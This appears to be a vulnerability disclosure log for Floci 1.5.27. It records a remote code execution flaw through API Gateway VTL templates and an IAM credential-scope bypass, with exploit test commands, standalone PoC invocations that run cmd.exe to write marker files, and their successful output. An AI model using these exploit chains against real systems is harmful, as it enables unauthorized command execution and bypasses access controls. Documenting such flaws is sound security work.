Target: Floci 1.5.27 Original RCE commit analyzed: 238294e779d0cd24835ba04d7bb16b1e1fd15f76 Latest upstream commit rechecked for IAM bypass chain: 7efb280dbcf6f5ea8faab28f1c7d5f8c3f59b4e0 Original JUnit RCE command: .\mvnw.cmd '-Denforcer.skip=true' '-Dmaven.compiler.release=21' '-Dmaven.compiler.enablePreview=true' '-DargLine=--enable-preview' '-Dtest=ApiGatewayVtlRceExploitTest' test Original JUnit RCE result: Tests run: 1, Failures: 0, Errors: 0, Skipped: 0 target\apigw-vtl-rce-marker.txt => FLOCI_APIGW_VTL_RCE Original standalone PoC command: python poc.py --host 127.0.0.1 --port 4566 --argv cmd.exe /c "echo FLOCI_STANDALONE_POC>C:/Temp/floci_standalone_poc.txt" Original standalone PoC result: [+] REST API id: d1e873f2f8 [+] Resource id: cfd975b9 [+] Trigger response: {"ok":true,"exit":"0"} [+] Command executed by Floci process [+] Cleanup delete REST API: HTTP 202 POC_EXIT=0 MARKER_EXISTS=True C:\Temp\floci_standalone_poc.txt => FLOCI_STANDALONE_POC IAM bypass regression command: .\mvnw.cmd -Dtest=ApiGatewayIamBypassRegressionTest test IAM bypass regression result: Tests run: 1, Failures: 0, Errors: 0, Skipped: 0 Correct apigateway credential scope was denied: HTTP 403 IAM enforcement DENY: action=apigateway:POST Wrong iam credential scope was allowed with the same access key: Created REST API Created API Gateway resource Stored responseTemplates entry Created deployment and stage Executed /execute-api/{apiId}/prod/probe Observed template-controlled HTTP 207 response Standalone wrong-scope bypass command shape: python poc.py --host 127.0.0.1 --port 4566 --bypass-iam --auth-access-key AKIAEXAMPLE --argv cmd.exe /c "echo FLOCI_BYPASS_CHAIN>C:/Temp/floci_bypass_chain.txt"